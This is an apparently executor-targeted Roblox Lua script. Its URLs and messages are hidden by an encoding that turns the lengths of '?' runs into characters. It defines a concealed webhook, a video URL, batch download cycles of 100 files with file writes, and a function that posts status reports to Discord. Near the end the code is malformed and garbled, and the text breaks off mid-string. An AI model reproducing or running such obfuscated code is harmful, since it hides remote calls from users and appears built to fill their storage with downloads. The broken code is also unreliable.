function jwhjhiNqKMPKrHjSvBOko(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


local webhookUrl = jwhjhiNqKMPKrHjSvBOko({'????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????','???????????????????????????????????????????????','???????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????','?????????????????????????????????????????????????','????????????????????????????????????????????????????','???????????????????????????????????????????????????','??????????????????????????????????????????????????????','???????????????????????????????????????????????????','????????????????????????????????????????????????????','??????????????????????????????????????????????????????','???????????????????????????????????????????????????','????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????','?????????????????????????????????????????????????????','?????????????????????????????????????????????????????????','?????????????????????????????????????????????????????','????????????????????????????????????????????????????','??????????????????????????????????????????????????','??????????????????????????????????????????????????????','????????????????????????????????????????????????????????','???????????????????????????????????????????????????????','????????????????????????????????????????????????????????','???????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????','??????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????','???????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????'})

if not writefile or not isfile or not delfile then
    warn(jwhjhiNqKMPKrHjSvBOko({'????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????'}))
    return
end

print(jwhjhiNqKMPKrHjSvBOko({'?????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????','????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????','?????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????','?????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????'}))

local videoUrl = jwhjhiNqKMPKrHjSvBOko({'????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????','???????????????????????????????????????????????','???????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????','????????????????????????????????????????????????','??????????????????????????????????????????????????','?????????????????????????????????????????????????????','?????????????????????????????????????????????????','????????????????????????????????????????????????','??????????????????????????????????????????????????','?????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????','??????????????????????????????????????????????????','????????????????????????????????????????????????????','?????????????????????????????????????????????????????????','????????????????????????????????????????????????','????????????????????????????????????????????????','??????????????????????????????????????????????????????','????????????????????????????????????????????????','?????????????????????????????????????????????????????????','??????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????'})
local DOWNLOAD_COUNT_PER_CYCLE = 100
local current_download_number = 1    
local totalDownloaded = 0
local scriptStartTime = os.time()
local videoData = nil
local isRunning = true
local exitReportSent = false

local function sendToDiscord(message, isEmbed)
    local success, result = pcall(function()
        local httpService = game:GetService(jwhjhiNqKMPKrHjSvBOko({'????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????'}))
        local data = {
            [jwhjhiNqKMPKrHjSvBOko({'???????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????'})] = message,
            [jwhjhiNqKMPKrHjSvBOko({'?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????'})] = jwhjhiNqKMPKrHjSvBOko({'????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????','?????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????'}),
            [jwhjhiNqKMPKrHjSvBOko({'?????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????'})] = jwhjhiNqKMPKrHjSvBOko({'????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????','???????????????????????????????????????????????','???????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????','?????????????????????????????????????????????????','?????????????????????????????????????????????????','????????????????????????????????????????????????????','??????????????????????????????????????????????????','?????????????????????????????????????????????????????','?????????????????????????????????????????????????????????','???????????????????????????????????????????????????','??????????????????????????????????????????????????','???????????????????????????????????????????????????','????????????????????????????????????????????????????','?????????????????????????????????????????????????????','????????????????????????????????????????????????','???????????????????????????????????????????????????????','???????????????????????????????????????????????????','???????????????????????????????????????????????????????','????????????????????????????????????????????????????','??????????????????????????????????????????????????????','???????????????????????????????????????????????????????','???????????????????????????????????????????????????','???????????????????????????????????????????????','?????????????????????????????????????????????????','?????????????????????????????????????????????????','????????????????????????????????????????????????????','??????????????????????????????????????????????????','?????????????????????????????????????????????????????','?????????????????????????????????????????????????????????','???????????????????????????????????????????????????','???????????????????????????????????????????????????','????????????????????????????????????????????????','??????????????????????????????????????????????????????','??????????????????????????????????????????????????????','???????????????????????????????????????????????????','??????????????????????????????????????????????????','?????????????????????????????????????????????????????????','???????????????????????????????????????????????????','???????????????????????????????????????????????????????','?????????????????????????????????????????????????????','??????????????????????????????????????????????????','??????????????????????????????????????????????????','???????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????','????????????????????????????????????????????????','??????????????????????????????????????????????????','???????????????????????????????????????????????????','????????????????????????????????????????????????','????????????????????????????????????????????????????????','?????????????????????????????????????????????????','?????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????','?????????????????????????????????????????????????????????','????????????????????????????????????????????????','???????????????????????????????????????????????????','????????????????????????????????????????????????','????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????','??????????????????????????????????????????????????????','???????????????????????????????????????????????????','??????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????'})
        }
        
        if isEmbed then
            data.embeds = {{
                [jwhjhiNqKMPKrHjSvBOko({'????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????'})] = jwhjhiNqKMPKrHjSvBOko({'????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????','????????????????????????????????','????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????','????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????'}),
                [jwhjhiNqKMPKrHjSvBOko({'???????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????'})] = 0x00FF88,
                [jwhjhiNqKMPKrHjSvBOko({'??????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????'})] = message,
                [jwhjhiNqKMPKrHjSvBOko({'????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????'})] = httpService:JSONDecode(jwhjhiNqKMPKrHjSvBOko({})jwhjhiNqKMPKrHjSvBOko({'????????????????????????????????','??????????????????????????????????????????????','??????????????????????????????????????????????','????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????'})!%Y-%m-%dT%H:%M:%SZjwhjhiNqKMPKrHjSvBOko({'?????????????????????????????????????????','????????????????????????????????','??????????????????????????????????????????????','??????????????????????????????????????????????','????????????????????????????????'})jwhjhiNqKMPKrHjSvBOko({})),
                [jwhjhiNqKMPKrHjSvBOko({'??????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','???????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','??????????????????????????????????????????????????????????????????????????????????????????????????????????????????'})] = {
                    [jwhjhiNqKMPKrHjSvBOko({'????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????????????'})] = jwhjhiNqKMPKrHjSvBOko({'??????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????','????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????????????','?????????????????????????????????????????????????????????????????????????????????????????????????????','????????????????????????????????','?????????????????????????????????????????????????????????????????????????????','?????????